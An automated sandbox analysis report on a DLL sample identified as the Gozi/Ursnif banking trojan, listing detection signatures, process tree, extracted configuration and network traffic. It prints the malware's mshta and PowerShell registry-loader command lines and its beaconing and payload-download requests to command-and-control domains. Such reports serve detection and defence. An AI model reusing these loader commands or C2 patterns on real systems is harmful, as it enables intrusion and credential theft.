
Analysis Report onerous.tar.dll

Overview

General Information

Sample Name: onerous.tar.dll
Analysis ID: 322295
MD5: 79d81979dbbd1c8ceb04cc80a903ecd1
SHA1: f40959018e132fb1430f77a26903af222244676c
SHA256: 5dd2f21b81330a342fe1bb9a17a8fde423928e266d4842887f8b41e5d7c2fbd6
Tags: dll


Detection

Gozi Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected Gozi e-Banking trojan
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Sigma detected: Dot net compiler compiles file from suspicious location
Yara detected Ursnif
Allocates memory in foreign processes
Changes memory attributes in foreign processes to executable or writable
Compiles code for process injection (via .Net compiler)
Creates a COM Internet Explorer object
Creates a thread in another existing process (thread injection)
Disables SPDY (HTTP compression, likely to perform web injects)
Found Tor onion address
Injects code into the Windows Explorer (explorer.exe)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Sigma detected: MSHTA Spawning Windows Shell
Sigma detected: Suspicious Csc.exe Source File Folder
Suspicious powershell command line found
Writes or reads registry keys via WMI
Writes registry values via WMI
Writes to foreign memory regions
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Compiles C# or VB.Net code
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file does not import any functions
Queries the installation date of Windows
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Tries to load missing DLLs
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Startup

  • System is w10x64
  • loaddll32.exe (PID: 6780 cmdline: loaddll32.exe 'C:\Users\user\Desktop\onerous.tar.dll' MD5: 76E2251D0E9772B9DA90208AD741A205)
    • control.exe (PID: 4672 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
  • iexplore.exe (PID: 7128 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 4812 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:7128 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • iexplore.exe (PID: 6188 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 4876 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6188 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
    • iexplore.exe (PID: 3732 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6188 CREDAT:17422 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • mshta.exe (PID: 5816 cmdline: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>' MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 5556 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 1364 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 4908 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\1453igkk\1453igkk.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 5016 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES8664.tmp' 'c:\Users\user\AppData\Local\Temp\1453igkk\CSCD2500265572748DEA3D91E508E5342FB.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • csc.exe (PID: 3360 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\jery0dbp\jery0dbp.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 6020 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES9384.tmp' 'c:\Users\user\AppData\Local\Temp\jery0dbp\CSCF9697DD756E45B2A9442C531AA1339A.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • explorer.exe (PID: 3388 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
  • cleanup

Malware Configuration

Threatname: Ursnif

{"server": "730", "os": "10.0_0_0_x64", "version": "250157", "uptime": "158", "system": "75b51dd63c757ef7e1ccbbde1d12750dhh%`", "size": "200775", "crc": "2", "action": "00000000", "id": "1100", "time": "1606281604", "user": "f73be0088695dc15e71ab15cb33c1faf", "hash": "0xa9e7194b", "soft": "3"}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
0000001A.00000003.397434238.000002A5846A0000.00000004.00000001.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000000.00000003.242195768.0000000003108000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000000.00000003.242321431.0000000003108000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000000.00000003.242337914.0000000003108000.00000004.00000040.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |
00000023.00000002.853077488.0000000000FDE000.00000004.00000001.sdmp | JoeSecurity_Ursnif | Yara detected Ursnif | Joe Security |

Sigma Overview

System Summary:

Sigma detected: Dot net compiler compiles file from suspicious location
Source: Process started; Author: Joe Security; Data: Command: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\1453igkk\1453igkk.cmdline', CommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\1453igkk\1453igkk.cmdline', CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5556, ProcessCommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\1453igkk\1453igkk.cmdline', ProcessId: 4908
Sigma detected: MSHTA Spawning Windows Shell
Source: Process started; Author: Michael Haag; Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 5816, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), ProcessId: 5556
Sigma detected: Suspicious Csc.exe Source File Folder
Source: Process started; Author: Florian Roth; Data: Command: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\1453igkk\1453igkk.cmdline', CommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\1453igkk\1453igkk.cmdline', CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 5556, ProcessCommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\1453igkk\1453igkk.cmdline', ProcessId: 4908

Signature Overview


AV Detection:

Antivirus / Scanner detection for submitted sample
Source: onerous.tar.dll; Avira: detected
Found malware configuration
Source: loaddll32.exe.6780.0.memstr; Malware Configuration Extractor: Ursnif {"server": "730", "os": "10.0_0_0_x64", "version": "250157", "uptime": "158", "system": "75b51dd63c757ef7e1ccbbde1d12750dhh%`", "size": "200775", "crc": "2", "action": "00000000", "id": "1100", "time": "1606281604", "user": "f73be0088695dc15e71ab15cb33c1faf", "hash": "0xa9e7194b", "soft": "3"}
Multi AV Scanner detection for domain / URL
Source: c56.lepini.at; Virustotal: Detection: 12%
Source: api10.laptok.at; Virustotal: Detection: 12%
Multi AV Scanner detection for submitted file
Source: onerous.tar.dll; Virustotal: Detection: 47%
Source: onerous.tar.dll; ReversingLabs: Detection: 58%
Machine Learning detection for sample
Source: onerous.tar.dll; Joe Sandbox ML: detected
Source: C:\Windows\System32\loaddll32.exe; Code function: 0_2_00458A61 RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,0_2_00458A61
Source: C:\Windows\System32\loaddll32.exe; Code function: 0_2_00443DEE lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,0_2_00443DEE
Source: C:\Windows\System32\loaddll32.exe; Code function: 0_2_00456E86 lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,0_2_00456E86
Source: C:\Windows\System32\loaddll32.exe; Code function: 0_2_00461C05 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree,0_2_00461C05

Networking:

Creates a COM Internet Explorer object
Source: C:\Windows\System32\loaddll32.exe; Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}
Source: C:\Windows\System32\loaddll32.exe; Key opened: HKEY_LOCAL_MACHINE\Software\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}
Source: C:\Windows\System32\loaddll32.exe; Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\TreatAs
Source: C:\Windows\System32\loaddll32.exe; Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\TreatAs
Source: C:\Windows\System32\loaddll32.exe; Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}
Source: C:\Windows\System32\loaddll32.exe; Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}
Source: C:\Windows\System32\loaddll32.exe; Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocServer32
Source: C:\Windows\System32\loaddll32.exe; Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocServer32
Source: C:\Windows\System32\loaddll32.exe; Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler32
Source: C:\Windows\System32\loaddll32.exe; Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler32
Source: C:\Windows\System32\loaddll32.exe; Key opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler
Source: C:\Windows\System32\loaddll32.exe; Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0002DF01-0000-0000-C000-000000000046}\InprocHandler
Found Tor onion address
Source: loaddll32.exe, 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp; String found in binary or memory: wADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/5.0 (Windows NT %u.%u%s; rv:82.0) Gecko/20100101 Firefox/82.0http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
Source: powershell.exe, 0000001A.00000003.397434238.000002A5846A0000.00000004.00000001.sdmp; String found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/5.0 (Windows NT %u.%u%s; rv:82.0) Gecko/20100101 Firefox/82.0; Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
Source: control.exe, 00000023.00000002.853077488.0000000000FDE000.00000004.00000001.sdmp; String found in binary or memory: ADVAPI32.DLLCryptGetUserKeyKERNEL32.DLLLoadLibraryExWWS2_32.DLLWSARecvWSASendclosesocketrecvCHROME.DLLsoft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%xversion=%u&soft=%u&user=%08x%08x%08x%08x&server=%u&id=%u&type=%u&name=%s&ip=%s&os=%s%u.%u_%u_%u_x%u&tor=1Mozilla/5.0 (Windows NT %u.%u%s; rv:82.0) Gecko/20100101 Firefox/82.0; Win64; x64http://https://file://USER.ID%lu.exe/upd %luCopyright (c) 2009 Microsoft Corporation.Software\AppDataLow\Software\Microsoft\MainBlockTempClientSystemIniKeysScrKillLastTaskLastConfigCrHookEdHookOpHookExec.onionTorClientTorCrc%s %s HTTP/1.1
Source: global traffic; HTTP traffic detected: GET /jvassets/xI/t64.dat HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: c56.lepini.at
Source: Joe Sandbox View; IP Address: 47.241.19.44 47.241.19.44
Source: Joe Sandbox View; ASN Name: CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC
Source: global traffic; HTTP traffic detected: GET /api1/7U45Cnfq9ga1e8EvVVl5Xw/PEp4yjCXLpMYN/6YsASJ53/HyrTUgpz9vVGeLRPz7uVIoJ/wfxlV_2BR_/2BKRWfbGdbKpccDlq/wjU_2FWdPQ1P/mnarl1yMJqa/qdhNVoh3oOz5bs/z60RqTSIuCKm6aR4446gj/CWuUplffN3IjYKGv/jAh08Sky_2BsVaS/mR26uhXrf_2FPOtRsi/kAWpATwOt/nHT1d49Zze7GI739MC4q/fqUVMDgzP8AWQSOV_2B/UYhCEI1zFK8E9H5v_0A_0D/bl8Ojy2x17tuP/HyuqS2KW/QxDOc9ASBROfBvf26kniC8O/wYs HTTP/1.1 | Accept: text/html, application/xhtml+xml, image/jxr, */* | Accept-Language: en-US | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Encoding: gzip, deflate | Host: api10.laptok.at | Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET /api1/xhsUm_2FnLgTwvG2iPTzCM2/vNAfftmWrr/Tvwy_2F0fKctIG74m/lS8RNzQeC42n/3Mv4DrZmcsV/dPovDeCz_2Bns7/SzRlXKXDTcnNvTwVof3JC/9OHXqekyZyAtiU_2/FKiPw6K2S4WkVU2/jPZ3OPDfyBZIrPRMr3/FBdYtTIJr/eK7MjotByUG0UytbsrJ_/2BIobg6gkWRSCkFALiR/3H39hT7Vg1tNx00aR3HUuS/eyDURwI5Q5dTx/nK0Boek7/Pnsv74L6CwFu08_0A_0D5Cn/saoDbWMFDu/ABzmmLf_2BuodD1FH/_2Ftl0V1Zs5G/QPAAHiHJ/7 HTTP/1.1 | Accept: text/html, application/xhtml+xml, image/jxr, */* | Accept-Language: en-US | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Encoding: gzip, deflate | Host: api10.laptok.at | Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET /favicon.ico HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Host: api10.laptok.at | Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET /api1/tWZ_2FD2Squg/FT7ec2R_2BI/1SrQaK0cbnFssD/EhaYqhgMTbjcAChT30HF6/_2F5KOHdpMr1MDEw/8l5rivX8vq0IZvK/gytYP5KOz0bdswPdPN/6JGFOawx9/jpz_2BKRYx6fKknk6pLW/tx_2FYdaEgf9TmZuTdQ/f0Tk4GzxbBo7nnpsJmyPiM/W7szWBXzIZ6B_/2B8hrjTH/_2FrpOMZRaBZ4xFjuf_2BhE/JcjrUYnllh/M19_2FdjJ2_2FYdJX/M9eFNCYNWFr2/TTPz7w_2FLg/lSv_0A_0DYUGze/qKcuuFgLExC0zUYAUDG_2/FUUaL9urgqUlfkic/Xw_2BsrLR7ACrKS/P753hBNv6/xxdXe7 HTTP/1.1 | Accept: text/html, application/xhtml+xml, image/jxr, */* | Accept-Language: en-US | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Encoding: gzip, deflate | Host: api10.laptok.at | Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET /favicon.ico HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Host: api10.laptok.at | Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET /api1/JmXqR48EV_2/Fj7krfHmz1m5r7/TqzrKRjj2RWEPmuZGbTA6/_2B_2FvhG_2BTX6K/ScV_2BId1l8xoRD/ZIKmgZ4Hr1ogBm_2Ft/cJTdN_2F0/sOkKUhNEij9EeyBjgxaS/fAWTeONzVOzjyGfrZxL/sesogOMoxfuQAI6mdY73Xa/BaJEnujvmw_2B/vRpLGOj_/2Bvahak4rScm4JpMfQfaO8m/3X9wT7Vyfk/qviTv3J0IbAJn2nUb/wbGIEFwb6Ch2/LDOx1illPXc/Hz_2BbvAx_2Fcr/j_0A_0DiinRm69PA4aJZ4/DJR7fgT5XYyNTfe4/_2FOY_2B_2/BAPo2cJ8YkUi/c HTTP/1.1 | Accept: text/html, application/xhtml+xml, image/jxr, */* | Accept-Language: en-US | User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko | Accept-Encoding: gzip, deflate | Host: api10.laptok.at | Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET /jvassets/xI/t64.dat HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Host: c56.lepini.at
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp; String found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp; String found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp; String found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp; String found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp; String found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
Source: msapplication.xml0.3.dr; String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x989f4a5a,0x01d6c2ea</date><accdate>0x989f4a5a,0x01d6c2ea</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml0.3.dr; String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x989f4a5a,0x01d6c2ea</date><accdate>0x989f4a5a,0x01d6c2ea</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
Source: msapplication.xml5.3.dr; String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x98a8d38c,0x01d6c2ea</date><accdate>0x98a8d38c,0x01d6c2ea</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml5.3.dr; String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x98a8d38c,0x01d6c2ea</date><accdate>0x98a8d38c,0x01d6c2ea</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
Source: msapplication.xml7.3.dr; String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x98ab35d9,0x01d6c2ea</date><accdate>0x98ab35d9,0x01d6c2ea</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: msapplication.xml7.3.dr; String found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x98ab35d9,0x01d6c2ea</date><accdate>0x98ab35d9,0x01d6c2ea</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
Source: unknown; DNS traffic detected: queries for: api10.laptok.at
Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx | Date: Tue, 24 Nov 2020 20:19:18 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close | Vary: Accept-Encoding | Content-Encoding: gzip | Data Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a | Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30
Source: explorer.exe, 00000021.00000000.412493518.0000000006100000.00000002.00000001.sdmp; String found in binary or memory: http://%s.com
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp; String found in binary or memory: http://amazon.fr/
Source: explorer.exe, 00000021.00000000.419863199.000000000F589000.00000004.00000001.sdmp; String found in binary or memory: http://api10.laptok.at/ap=j%E/
Source: ~DFCE3757A75A0E50D1.TMP.3.dr, {C152A990-2EDD-11EB-90E4-ECF4BB862DED}.dat.3.dr; String found in binary or memory: http://api10.laptok.at/api1/7U45Cnfq9ga1e8EvVVl5Xw/PEp4yjCXLpMYN/6YsASJ53/HyrTUgpz9vVGeLRPz7uVIoJ/wf
Source: explorer.exe, 00000021.00000000.401136187.0000000001980000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000026.00000000.426842454.000001FC11790000.00000002.00000001.sdmp; String found in binary or memory: http://api10.laptok.at/api1/JmXqR48EV_2/Fj7krfHmz1m5r7/TqzrKRjj2RWEPmuZGbTA6/_2B_2FvhG_2BTX6K/S
Source: {E26E6CA8-2EDD-11EB-90E4-ECF4BB862DED}.dat.20.dr; String found in binary or memory: http://api10.laptok.at/api1/JmXqR48EV_2/Fj7krfHmz1m5r7/TqzrKRjj2RWEPmuZGbTA6/_2B_2FvhG_2BTX6K/ScV_2B
Source: {DC6A3E21-2EDD-11EB-90E4-ECF4BB862DED}.dat.20.dr; String found in binary or memory: http://api10.laptok.at/api1/tWZ_2FD2Squg/FT7ec2R_2BI/1SrQaK0cbnFssD/EhaYqhgMTbjcAChT30HF6/_2F5KOHdpM
Source: {DC6A3E1F-2EDD-11EB-90E4-ECF4BB862DED}.dat.20.dr, ~DFAC17D42899691A13.TMP.20.dr; String found in binary or memory: http://api10.laptok.at/api1/xhsUm_2FnLgTwvG2iPTzCM2/vNAfftmWrr/Tvwy_2F0fKctIG74m/lS8RNzQeC42n/3Mv4Dr
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp; String found in binary or memory: http://ariadna.elmundo.es/
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp; String found in binary or memory: http://ariadna.elmundo.es/favicon.ico
Source: explorer.exe, 00000021.00000000.412685847.00000000061F3000.00000002.00000001.sdmp; String found in binary or memory: http://arianna.libero.it/
